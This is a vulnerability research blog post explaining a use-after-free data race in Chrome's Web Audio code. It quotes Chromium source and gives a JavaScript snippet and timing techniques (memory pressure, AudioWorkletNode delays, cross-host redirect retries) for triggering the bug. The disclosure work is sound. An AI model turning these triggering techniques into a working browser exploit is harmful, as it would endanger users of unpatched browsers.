Triggering garbage collection with rejected promises to cause use-after-free in Chrome

In this post I’ll show how garbage collections (GC) in Chrome may be triggered with small memory allocations in unexpected places, which was then used to cause a use-after-free bug.

|
| 9 minutes

In this post and the next we’ll review the details of some use-after-free bugs that I found in the Web Audio module in Google Chrome. Although the vulnerabilities are found in Web Audio, the way they’re triggered involves more general techniques, which will be the focus of these posts.

More specifically, we’ll review a use-after-free that’s triggered by a data race, along with how to trigger it using some internals of the garbage collector. While the bug is fairly hard to exploit, the way to trigger it is interesting.

Web Audio

The vulnerability is found in the web audio module in blink, which runs in the renderer and hence sandboxed. It is the implementation for the Web Audio API in Chrome. In October 2019, Anton Ivanov and Alexey Kulaev at Kaspersky reported a vulnerability in this module that was exploited in the wild. Since then, Sergei Glazunov of Google Project Zero has carried out variant analysis using CodeQL and discovered three variants of this bug (See also Maddie Stone’s presentation at BlueHat IL for more background)

I’ll now go through some concepts in web audio that are required to understand the issues covered in this and the next post. Before reading this, it will be helpful to familiarize yourself with Web Audio’s basic concepts documented here.

BaseAudioContext, AudioNode and AudioHandler

BaseAudioContext is the implementation of BaseAudioContext of the Web Audio API. It provides the rendering context for creation of AudioNode, which is used for building graphs to process audio input. For more information, review the concepts behind the Web Audio API.

AudioNode provides an interface to Javascript and delegates its operations to AudioHandler. Each AudioNode holds an AudioHandler that is responsible for its implementation as a scoped_refptr and thereby keeping it alive. An AudioNode also holds the BaseAudioContext that it’s created in as a Member, meaning that a BaseAudioContext cannot be garbage collected until all AudioNode objects that it created are garbage collected.

Rendering graph pulling and ownership transfer of AudioHandler

Each BaseAudioContext holds a special AudioNode that is derived from AudioDestinationNode as a Member. This node implements the necessary methods for tracking down the audio graph and rendering the audio input. For example, the OfflineAudioContext implements it in the DoOfflineRendering method.

During rendering, if an AudioNode gets garbage collected, the AudioHandler that’s used for rendering may get deleted and cause use-after-free bugs, such as what happen in this issue. To prevent such vulnerabilities, when an AudioNode gets garbage collected (which happens on the main thread), if rendering is happening in the audio thread, it transfers ownership of its AudioHandler to the DeferredTaskHandler, which keeps the handler alive until the current rendering unit (quantum) is done. Clearing out these orphan handlers happens either at the end of the quantum, when RequestToDeleteHandlersOnMainThread is called or when ClearHandlersToBeDeleted is called when the execution context (e.g. webpage, iframe etc.) is destroyed. Both of these will clear out rendering_orphan_handlers_ and may delete the AudioHandler that’s transferred to it.

GraphAutoLocker and tear_down_mutex_

As AudioHandler objects are often accessed in the audio thread, while they’re destroyed in the main thread, care must be taken to prevent them from being accessed while the main thread is trying to destroy them. This is usually done using the GraphAutoLocker and the more recently introduced tear_down_mutex_. Access to AudioHandler objects in the audio thread must be protected by either of these locks to prevent any use-after-free caused by a data race. There are also other more fine-grained locks that are specific to some nodes, such as the process_lock_ that’s relevant to the issues found by Anton Ivanov and Alexey Kulaev (at Kaspersky) and Sergei Glazunov of Google Project Zero mentioned in the introduction.

The vulnerability

The current issue is a use-after-free caused by a data race where access to AudioHandler isn’t protected. It’s fairly easy to trigger on the master branch at the time of report (@f440b57), where the tear_down_mutex_ is removed, but triggering it on the release branch (80.0.3987.132) is a lot more interesting and what we’ll start to review.

On 80.0.3987.132, the rendering method in OfflineAudioDestinationNode contains the following code:

  {
    MutexTryLocker try_locker(Context()->GetTearDownMutex());
    if (try_locker.Locked()) {
      DCHECK_GE(NumberOfInputs(), 1u);

      // This will cause the node(s) connected to us to process, which in turn
      // will pull on their input(s), all the way backwards through the
      // rendering graph.
      AudioBus* rendered_bus = Input(0).Pull(destination_bus, number_of_frames);

      if (!rendered_bus) {
        destination_bus->Zero();
      } else if (rendered_bus != destination_bus) {
        // in-place processing was not possible - so copy
        destination_bus->CopyFrom(*rendered_bus);
      }
    } else {
      destination_bus->Zero();
    }

    // Process nodes which need a little extra help because they are not
    // connected to anything, but still need to process.
    Context()->GetDeferredTaskHandler().ProcessAutomaticPullNodes(            //<--- Only protected if try_locker succeeded
        number_of_frames);
  }

Note that the above snippet tries to acquire the tear down lock, and if it succeeds, it performs Input(0).Pull(...). However, ProcessAutomaticPullNodes is performed regardless of whether the lock is acquired successfully. Inside the ProcessAutomaticPullNodes method, the AudioHandler in rendering_automatic_pull_handlers_ is accessed:

void DeferredTaskHandler::ProcessAutomaticPullNodes(
    uint32_t frames_to_process) {
  DCHECK(IsAudioThread());

  for (unsigned i = 0; i < rendering_automatic_pull_handlers_.size(); ++i) {
    rendering_automatic_pull_handlers_[i]->ProcessIfNecessary(
        frames_to_process);
  }
}

If the audio thread fails to acquire the tear down lock, then access to rendering_automatic_pull_handlers_ won’t be protected. While this looks like a candidate for data race, let’s take a look at what it takes to get a use-after-free bug out of this. The rendering_automatic_pull_handlers_ gets updated every time DeferredTaskHandler::UpdateAutomaticPullNodes is called. This happens when HandlePreRenderTasks is called, right before the audio thread tries to acquire the tear down lock:

  if (Context()->HandlePreRenderTasks(nullptr, nullptr)) {      //<--- Updates `rendering_automatic_pull_handlers_`
    SuspendOfflineRendering();
    return true;
  }

  {
    MutexTryLocker try_locker(Context()->GetTearDownMutex());
    if (try_locker.Locked()) {
      DCHECK_GE(NumberOfInputs(), 1u);

And it is protected by the graph lock.

Updating rendering_automatic_pull_handlers_ means that any change to the graph, such as the destruction of AudioNode that is needed to trigger a use-after-free, must happen after Context()->HandlePreRenderTasks is called, or at least after rendering_automatic_pull_handlers_ is updated there, otherwise the AudioHandler will be removed from rendering_automatic_pull_handlers_ and won’t be used again.

In order to cause a use-after-free in ProcessAutomaticPullNodes, we first need to destroy the AudioNode that holds the AudioHandler in the rendering_automatic_pull_handlers_. This requires a garbage collection of these AudioNode to happen after rendering_automatic_pull_handlers_ is updated in the audio thread. As garbage collection will call AudioNode::Dispose, which is locked by the graph lock, this can only happen after HandlePreRenderTasks is completed. However, this is not enough to destroy AudioHandler. As this is happening during the audio rendering, AudioNode will transfer the ownership of the AudioHandler to rendering_orphan_handlers_ in DeferredTaskHandler, which means that after this point, both the rendering_orphan_handlers_ and rendering_automatic_pull_handlers_ will be responsible for keeping these handlers alive. Both of which are cleared when ClearHandlersToBeDeleted is called:

void DeferredTaskHandler::ClearHandlersToBeDeleted() {
  DCHECK(IsMainThread());
  GraphAutoLocker locker(*this);
  tail_processing_handlers_.clear();
  rendering_orphan_handlers_.clear();
  deletable_orphan_handlers_.clear();
  automatic_pull_handlers_.clear();
  rendering_automatic_pull_handlers_.clear();
  active_source_handlers_.clear();
}

As rendering_automatic_pull_handlers_ is cleared last, calling ProcessAutomaticPullNodes while rendering_automatic_pull_handlers_ is cleared may cause a use-after-free bug.

In order to cause an unprotected access to ProcessAutomaticPullNodes, on the other hand, it requires the audio thread to fail in acquiring the tear down lock. This means that the BaseAudioContext::Uninitialize method must be called before the audio thread tries to acquire the lock, and this will also call ClearHandlersToBeDeleted to clear out the handles.

The following figure shows the order of events that needs to happen in both the main thread and the audio thread.

race window

This means that on the main thread, a GC cycle needs to be started and completed, and then the execution context needs to be destroyed and BaseAudioContext::Uninitialize called between the end of HandlePreRenderTasks and Context()->GetTearDownMutex().

  if (Context()->HandlePreRenderTasks(nullptr, nullptr)) {
  ...
  //Destruction window, where GC needs to complete followed by a BaseAudioContext::Uninitialize called.
  {
    MutexTryLocker try_locker(Context()->GetTearDownMutex());
    if (try_locker.Locked()) {
      DCHECK_GE(NumberOfInputs(), 1u);

Unless there is a way to cause the two threads to run at a significantly different speed, it is impossible to fit all these in such a tight window. If anyone does know how to do that, please feel free to reach out as I’d be very interested to learn.

Triggering GC in BaseAudioContext::Uninitialize

Another idea is to see if there is any way to trigger GC in the BaseAudioContext::Uninitialize method, before ClearHandlersToBeDeleted is called. That way, we only need to time it so that BaseAudioContext::Uninitialize is called before the audio thread got hold of the tear down lock, which is not difficult. As it turns out, the BaseAudioContext::Uninitialize will call RejectPendingResolvers before ClearHandlersToBeDeleted is called to reject all the unresolved promises. In the OfflineAudioContext, this will allocate a DOMException for each unresolved promise:

void OfflineAudioContext::RejectPendingResolvers() {
  ...
  for (auto& pending_suspend_resolver : scheduled_suspends_) {
    pending_suspend_resolver.value->Reject(MakeGarbageCollected<DOMException>(
        DOMExceptionCode::kInvalidStateError, "Audio context is going away"));   //<--- Allocates GCed objects
  }
  ...
}

Allocation of MakeGarbageCollected will cause memory pressure and can potentially trigger a garbage collection. Trying to trigger GC using unresolved promises alone, however, is fairly difficult as DOMException are small objects and it would require a prohibitively large amount of promises to trigger GC. We therefore need to build up memory pressure beforehand.

When a GarbageCollected (on-heap) object is allocated, the AllocateObject will first try to allocate the memory from existing free space that it manages, failing that, it will go to OutOfLineAllocate to allocate some new free space and then allocate the object. After the object is allocated, OutOfLineAllocate will call AllocatedObjectSizeSafepoint, which, through a series of calls, will call EmbedderHeapTracer::IncreaseAllocatedSize and then LocalEmbedderHeapTracer::StartIncrementalMarkingIfNeeded.

void LocalEmbedderHeapTracer::StartIncrementalMarkingIfNeeded() {
  if (!FLAG_global_gc_scheduling || !FLAG_incremental_marking) return;

  Heap* heap = isolate_->heap();
  heap->StartIncrementalMarkingIfAllocationLimitIsReached(
      heap->GCFlagsForIncrementalMarking(),
      kGCCallbackScheduleIdleGarbageCollection);
  if (heap->AllocationLimitOvershotByLargeMargin()) {
    heap->FinalizeIncrementalMarkingAtomically(           //<--- Triggers a full GC
        i::GarbageCollectionReason::kExternalFinalize);
  }
}

At this point, if the heap->AllocationLimitOvershotByLargeMargin() check passed, a full GC will be triggered, collecting both objects in the old space and the young space. This test essentially looks at how much memory is already allocated (but not yet collected) and sees how much it exceeded some threshold. The ‘overshoot’ value here is not just the amount of the current allocation, but also memory that has been allocated previously but not yet freed or collected. Once the overshoot value is high enough, a full GC will be triggered. The allocated value will then be adjusted, as well as the threshold. As the overshoot value takes into account all the memory that is currently allocated, by carefully controlling how much memory we allocated we can trigger GC even with a small memory allocation, such as the allocations of DOMException in RejectPendingResolvers.

Getting the timing right

After some experimentation, I managed to trigger GC during RejectPendingResolvers, but only when I allocate a large amount of memory right before destroying the execution context. In my case, this sequence looks like:

  //Prepare memory pressure
  for (let i = 0; i < 180; i++) {
    arr[i] = new Array(1024 * 1024);
    arr[i].fill(1);
  }
  let frame = document.getElementById("ifrm");
  //Trigger BaseAudioContext::Uninitialize and then GC within it.
  frame.parentNode.removeChild(frame);

This is called from an iframe that contains the relevant BaseAudioContext, AudioHandler etc. What happens in different threads is now the following:

threads

The main problem with a large allocation is that it’s difficult to both land the BaseAudioContext::Uninitialize and ClearHandlersToBeDeleted in the right place, because any small fluctuation in the allocation time will cause big differences in the overall timing.

We use an AudioWorkletNode to control the timing. As this node uses a user-supplied function to process the audio, I’m able to use it to control the timing in the audio thread. By using an AudioWorkletNode with a delay that’s roughly equal to the time it takes between BaseAudioContext::Uninitialize and ClearHandlersToBeDeleted. I can get the ClearHandlersToBeDeleted to run concurrently with ProcessAutomaticPullNodes if I can get BaseAudioContext::Uninitialize to land in this window:

  if (!IsInitialized()) {
    destination_bus->Zero();
    return false;
  }
  //Window start to trigger `BaseAudioContext::Uninitialize`
  if (Context()->HandlePreRenderTasks(nullptr, nullptr)) {
    SuspendOfflineRendering();
    return true;
  }
  //Window end to trigger `BaseAudioContext::Uninitialize`
  {
    MutexTryLocker try_locker(Context()->GetTearDownMutex());

For a component_build, which is mostly used during development to speed up build time, the tear down lock somehow synchronizes the two threads. This is due to BaseAudioContext::Uninitialize having to land while the AudioWorkletNode is processing, and then having to wait for the tear down lock to release before it can continue, which is the time when BaseAudioContext::Uninitialize is triggered. This is fairly consistent in relation to the rendering quantum. As it turns out, when this BaseAudioContext::Uninitialize is called, it also lands in the appropriate window in the next rendering quantum. This makes it easy to control the timing and trigger the bug. On a non component build, although the tear down lock still synchronizes the threads in the same way, BaseAudioContext::Uninitialize somehow triggers too early and misses the window. To synchronize the two threads, you would probably need to use currentFrame in the AudioWorkletProcessor, which can be accessible in both the audio and main threads to get the timing right. I believe this is doable, but rather tedious, and haven’t actually tried it myself.

Getting reliability through unlimited retries

As the data race issue relies on getting the timing right, it may requires multiple tries to trigger it. Normally, this can be done by reloading the page. However, because a reload does not reset the allocation threshold, which is crucial for triggering GC in the right place, reloading a page would not work in this case. However, this can be done by setting up two different hosts that host the same pages, and have them redirect to one another. Essentially, this reloads the page from a different host. By doing so, a new renderer is used to load the new page each time, thereby resetting the state of the allocation threshold (etc.). This means that the bug would likely to be triggered with just a single click that launched the page (after enough number of retries).

Written by

Related posts